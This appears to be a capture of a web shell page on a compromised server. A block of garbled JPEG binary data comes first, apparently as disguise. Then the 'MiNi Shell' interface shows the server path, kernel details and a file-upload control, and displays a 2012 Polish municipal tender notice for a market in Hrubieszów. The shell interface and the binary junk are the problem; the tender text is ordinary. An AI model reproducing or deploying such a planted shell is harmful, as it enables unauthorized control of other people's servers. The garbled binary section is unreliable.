JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121214/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121214/511570-N-2012.html

<p class="kh_header"><b>Hrubieszów: Budowa targowiska stałego, oznaczonego nazwą Mój Rynek, na terenie bazy Przedsiębiorstwa Gospodarki Komunalnej i Mieszkaniowej Sp. z o.o. w Hrubieszowie, ul. Krucza 20.</b><br>
<b>Numer ogłoszenia: 511570 - 2012; data zamieszczenia: 14.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Hrubieszów , ul. mjr H. Dobrzańskiego "Hubala" 1, 22-500 Hrubieszów, woj. lubelskie, tel. 084 6962380 w. 54, faks 084 6962380.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miasto.hrubieszow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa targowiska stałego, oznaczonego nazwą Mój Rynek, na terenie bazy Przedsiębiorstwa Gospodarki Komunalnej i Mieszkaniowej Sp. z o.o. w Hrubieszowie, ul. Krucza 20..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest budowa stałego targowiska Mój Rynek                          w Hrubieszowie, realizowanego w ramach działania 321 Podstawowe usługi dla gospodarki i ludności wiejskiej objętego Programem Rozwoju Obszarów Wiejskich na lata 2007 - 2013, współfinansowana zgodnie z podpisaną w dniu 18 lipca 2012 r. umową nr 00322-6921-UM03300358/12 o dofinansowanie operacji Budowa targowiska stałego, oznaczonego nazwą Mój Rynek na terenie bazy Przedsiębiorstwa Gospodarki Komunalnej i Mieszkaniowej Sp. z o.o. w Hrubieszowie, ul. Krucza 20.
Obszar inwestycji obejmujący działki o numerach 316/3, 317/1 objęty jest ochroną Wojewódzkiego Konserwatora Zabytków. 
Zestawienie powierzchni placu targowego: 
- Powierzchnia placu targowego - 3187,50 m2
- Powierzchnia miejsc postojowych - 623,0 m2
- Powierzchnia dróg dojazdowych - 999,29 m2
- Pozostała powierzchnia utwardzona( plac targowy, dojścia) - 1259,21m2
- Powierzchnia zieleni - 306,0m2
Przedmiot zamówienia obejmuje wykonanie poniższego zakresu:
1.	Branża budowlana tj.:
Roboty rozbiórkowe - rozebranie konstrukcji stalowych szklarni z elementów stalowych - 727,40 m2  oraz ścian żelbetowych - 13,80 m3
Konstrukcja zadaszenia 1 (handel artykułami rolno-spożywczymi): przykrycie stoisk oraz alei pomiędzy stoiskami zadaszeniami dwuspadowymi. Elementy konstrukcyjne dachu o wymiarach 80x80x5 będą oparte na słupach stalowych             o wymiarach 100x100x5 zaprojektowanych w rozstawie co 6,0m wzdłuż stoisk handlowych. Słupy w układzie poprzecznym w rozstawie co 3,60 oraz 3,80 m. Pomiędzy słupami zaprojektowano kratownicę z elementów o wymiarach 50x50x4 (pas górny i dolny) oraz 30x30x3. Wysokość zadaszenia w najwyższym miejscu wynosi 3,63 m.
Konstrukcja zadaszenia 2 (handel artykułami tekstylnymi) wzdłuż granicy północno - wschodniej zaprojektowano wykonanie osobnego zadaszenia dwuspadowego o rozpiętości 3,40 m. Konstrukcję zadaszenia zaprojektowano              z elementów o wymiarach 80x80x5, opartych na słupach stalowych o wymiarach 120x120x6 zaprojektowanych w rozstawie co 3,0 m. Wysokość zadaszenia 3,56 m.
Stanowiska handlowe wyposażone w stoły o wymiarach 80 x 220 cm i wysokości 100cm - 38 szt., oraz o wym. 80x440cm i wysokości 100cm - 6 szt. Blaty zaprojektowano z betonu architektonicznego, opcjonalnie lastryko. Stanowiska handlowe osłonięte ściankami z cegły klinkierowej gr.12,0 cm na wysokość 60 cm.
Elementy małej architektury: ławki o wym. 40 x 100cm, stojaki na jednoślady          - 3 szt., tablica informacyjna o wym. 70x100cm. - 1 szt., kosze na śmieci - 14 szt., słupki o wys.110 cm wzdłuż placu targowego - 22 szt., odbojnica parkingowa - 4 szt. 
Ogrodzenie dł. 231,7 mb, wys. 180cm z prętów stalowych o prostokątnych oczkach montowane na słupach o przekroju zamkniętym. Słupki ogrodzeniowe o wym. 60x40 mm w rozstawie co 250 cm. Zaprojektowano dwie bramy wjazdowe wyposażone            w rygiel. Szerokość bram 6,0 m. Rama z elementów 60x40,wypełnienine siatką             z prętów stalowych, słupy bramowe 150 x150.
Ściana p.poż. oddzielająca
Sanitariaty (wydzielenie z istniejącego budynku) z podjazdem dla osób niepełnosprawnych. Przewiduje się wydzieleniu w istniejącym budynku na poziomie parteru przestrzeni na potrzeby sanitariatów wg. poniższego zestawienia:
Hol - 10,10 m2
Przedsionek WC dla mężczyzn - 2,38 m2
WC dla mężczyzn - 4,89 m2
Przedsionek WC dla kobiet - 5,66 m2
WC dla kobiet  - 6,60 m2
WC dla osób niepełnosprawnych - 5,23 m2
Pomieszczenie porządkowe  - 1,88 m2
RAZEM 36,74 m2
2.	Branża drogowa tj.:
- nawierzchnia parkingu, zjazdu, dojazdów z kostki brukowej betonowej gr. 8 cm szarej,  układana na podsypce cementowo-piaskowej - 1598 m2.
- nawierzchnia parkingu z kostki brukowej betonowej grubości 8 cm kolorowej,  układana na podsypce cementowo-piaskowej, spoiny wypełniane piaskiem                - wyznaczenie miejsc do parkowania  63 m2
- nawierzchnie z kostki brukowej betonowej grubość 6 cm na podsypce cementowo             -  piaskowej 1260,00 m2 na części targowej.
- miejsca postojowe dla 45 stanowisk w tym:
    3 stanowiska o wymiarach 3,60 x 5,00 dla osób niepełnosprawnych,
    34 stanowiska o wymiarach 2,50 x 5,00 dla samochodów osobowych,
    8 stanowisk o wymiarach 3,00 x 5,00 handel z samochodów.
3.	Branża sanitarna tj.:
- instalacje sieci odciągowej i kanalizacji sanitarnej w sanitariatach targowiska,
- instalacje wentylacji mechanicznej wywiewnej w sanitariatach targowiska,
- instalacja grzewcza w sanitariatach targowiska,
- przyłącze kanalizacji sanitarnej - 77 mb,
- przyłącze wodociągowe do budynku sanitariatów -  48 mb,
- przyłącze kanalizacji deszczowej - 245 mb.
4.	Branża eklektyczna tj.:
- wymiana istniejących punktów oświetleniowych w pobliżu stacji gazu i budowę  nowych,
- oświetlenia targowiska i parkingu,
- oświetlenie każdej z części stanowisk handlowych za pomocą 12 lamp podwieszanych na konstrukcji stalowej nośnej. Pozostał część placu oświetlona lampami typu parkowego o wysokości 3-4 m.
- instalacja odgromowa zadaszenia
5.	Zieleń 
Przewidziano likwidację istniejących drzew iglastych w pobliżu stacji gazu oraz nasadzenia niskopiennej zieleni ozdobnej wzdłuż ciągów pieszych na placu targowym (np. Jesion wyniosły wys. 2,0-3,0m, średnica korony1,5-2,0 m), uzupełnienie ciągu zieleni wysokiej wzdłuż granicy północno-zachodniej na całej szerokości placu targowego. Należy wykonać nasadzenia stanowiące kontynuację nasadzeń w tym miejscu. (np. sosny lub świerki)
6.	Usługa geodezyjna - prace związane z wytyczeniem i inwentaryzacją geodezyjno        - powykonawczą (nie ujęte w Przedmiarze Robót).
Szczegółowy zakres oraz technologię robót określa dokumentacja projektowa stanowiąca Załącznik nr 12. 
Przedmiary robót i kosztorysy załączone do specyfikacji stanowiące Załącznik nr 11  są opracowaniem wtórnym w stosunku do projektu dokumentacji projektowej. Zawierają zestawienie przewidywanych robót w celu zobrazowania skali zamierzenia budowlanego i ułatwienia Wykonawcom oszacowania kosztów realizacji inwestycji, dlatego co do zasady pełnią funkcję pomocniczą, gdyż cena za wykonanie przedmiotu zamówienia jest CENĄ RYCZAŁTOWĄ .
Jeżeli w SIWZ przy opisie przedmiotu zamówienia wskazana została nazwa producenta, znak towarowy,  patent  lub pochodzenie w stosunku do określonych materiałów, urządzeń, itp. Zamawiający wymaga, aby traktować takie wskazanie jako przykładowe   i dopuszcza zastosowanie przy realizacji zamówienia materiałów, urządzeń, itp. równoważnych o parametrach nie gorszych niż wskazane.
Wykonawca może zastosować materiały równoważne, ale muszą one być nie gorsze od materiałów zastosowanych w dokumentacji lub muszą przewyższać jakością materiały ujęte w dokumentacji. W przypadku zastosowania materiałów równoważnych dotyczących zamówienia Wykonawca przedstawi niezbędne certyfikaty lub badania dla wszystkich materiałów tzw. równoważnych na etapie składania ofert.
Jeżeli w dokumentacji projektowej występują odwołania do polskich norm, aprobat technicznych, itp., dopuszczalne jest stosowanie odpowiednich norm krajów Unii Europejskiej w zakresie przyjętym przez polskie prawodawstwo..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.31.42-0, 45.21.55.00-2, 45.11.00.00-1, 45.26.27.00-8, 45.33.00.00-9, 45.31.00.00-3, 31.52.72.00-8, 45.23.32.50-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Ustala się wadium w wysokości  15.000  zł. (słownie: piętnaście tysięcy zł.).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga posiadania niezbędnej wiedzy i doświadczenia tj.              w okresie ostatnich pięciu lat, a jeżeli okres działalności jest krótszy w tym okresie, wykonania minimum dwóch robót odpowiadających rodzajem robocie będącej przedmiotem zamówienia. Za robotę odpowiadającą swoim rodzajem  robotom stanowiącym przedmiot zamówienia Zamawiający uzna co najmniej  dwie roboty budowlane o wartości minimum 300.000,00 zł. każda. 
Ocena spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów: 
1)	wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania  warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 
Ocena spełnienia tego warunku dokonana będzie przez Zamawiającego na podstawie złożonych przez Wykonawców dokumentów i oświadczeń, z których jednoznacznie musi wynikać, iż ww. warunki wykonawca spełnił, stosując formułę: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga dysponowania osobami zdolnymi do wykonania zamówienia, tj. posiadającymi wymagane prawem uprawnienia budowlane do kierowania robotami budowlanymi w specjalnościach:
- konstrukcyjno - budowlanej w obiektach budowlanych pełniący funkcję  kierownika  budowy;
- instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych;
- instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych                          i elektroenergetycznych.
- drogowej. 
Ocena spełnienia tego warunku dokonana będzie przez Zamawiającego na podstawie złożonych przez Wykonawców tj. Wykazu potencjału kadrowego, z którego jednoznacznie musi wynikać, iż ww. warunki wykonawca spełnił, stosując formułę: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga aby Wykonawca wykazał się sytuacją ekonomiczną              i finansową zapewniającą wykonanie zamówienia, a w szczególności wykażą dysponowanie środkami finansowymi lub zdolnością kredytową na kwotę co najmniej 300.000 złotych oraz opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca 
jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej           z przedmiotem zamówienia.
Ocena spełnienia tego warunku dokonana będzie przez Zamawiającego na podstawie złożonych przez Wykonawców dokumentów i oświadczeń, z których jednoznacznie musi wynikać, iż ww. warunki wykonawca spełnił, stosując formułę: spełnia - nie spełnia.
Jeśli wykonawca z uzasadnionej przyczyny nie może przedstawić wymaganych dokumentów celem potwierdzenia spełniania warunku dotyczącego jego sytuacji ekonomicznej i finansowej, może przedłożyć inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz oferty, stanowiący załącznik nr 1  do  SIWZ.
2.	Dowód wniesienia wadium
3.	Kosztorysy ofertowe opracowane i wycenione przez Wykonawcę.
4.	Wypełniony Harmonogram rzeczowo - finansowy zgodny z kosztorysami ofertowymi - wg załącznika nr 10  
5.	W przypadku udziału podwykonawców - załącznik nr 5.
6.	Pisemne zobowiązanie innych  podmiotów do oddania wykonawcy  do dyspozycji  
     niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia        - załącznik  nr 9 - jeżeli   dotyczy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany postanowień umowy oraz określa warunki zmian:
1)	Kwota wynagrodzenia brutto może ulec zmianie w przypadku ustawowej zmiany obowiązującej stawki VAT o wielkość wynikającą ze zmiany stawki. 
2)	Kwota wynagrodzenia brutto może ulec zmianie w przypadku wystąpienia robót dodatkowych lub zamiennych, których wykonanie uzależnia wykonanie zamówienia podstawowego,
3)	Termin zakończenia robót budowlanych może ulec zmianie z powodu niekorzystnych warunków atmosferycznych (takich jak intensywne opady śniegu lub deszczu, silny wiatr) zamawiający może przedłużyć termin wykonania umowy o czas niezbędny do wykonania zamówienia uwzględniając tylko dni niekorzystne.
4)	Zamawiający może zawiesić wykonanie umowy na okoliczność wniesienia odwołania.
5)	Zamawiający może przedłużyć termin wykonania robót budowlanych o czas niezbędny do  rozpatrzenia odwołania, jeżeli  wystąpi.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.miasto.hrubieszow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta                       w Hrubieszowie - Wydział Gospodarki Mieniem Komunalnym i Ochrony Środowiska  ul. 3-go Maja 15 tel. 084 6962380 w. 56..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.01.2013 godzina 13:00, miejsce: Sekretariat - Urząd Miejski w Hrubieszowie ul. Mjr H. Dobrzańskiego Hubala 1,  22-500 Hrubieszów..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie jest współfinansowane w ramach działania 321, Podstawowe usługi dla gospodarki i ludności wiejskie, objętego Programem Rozwoju Obszarów Wiejskich na lata 2007 - 2013,.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com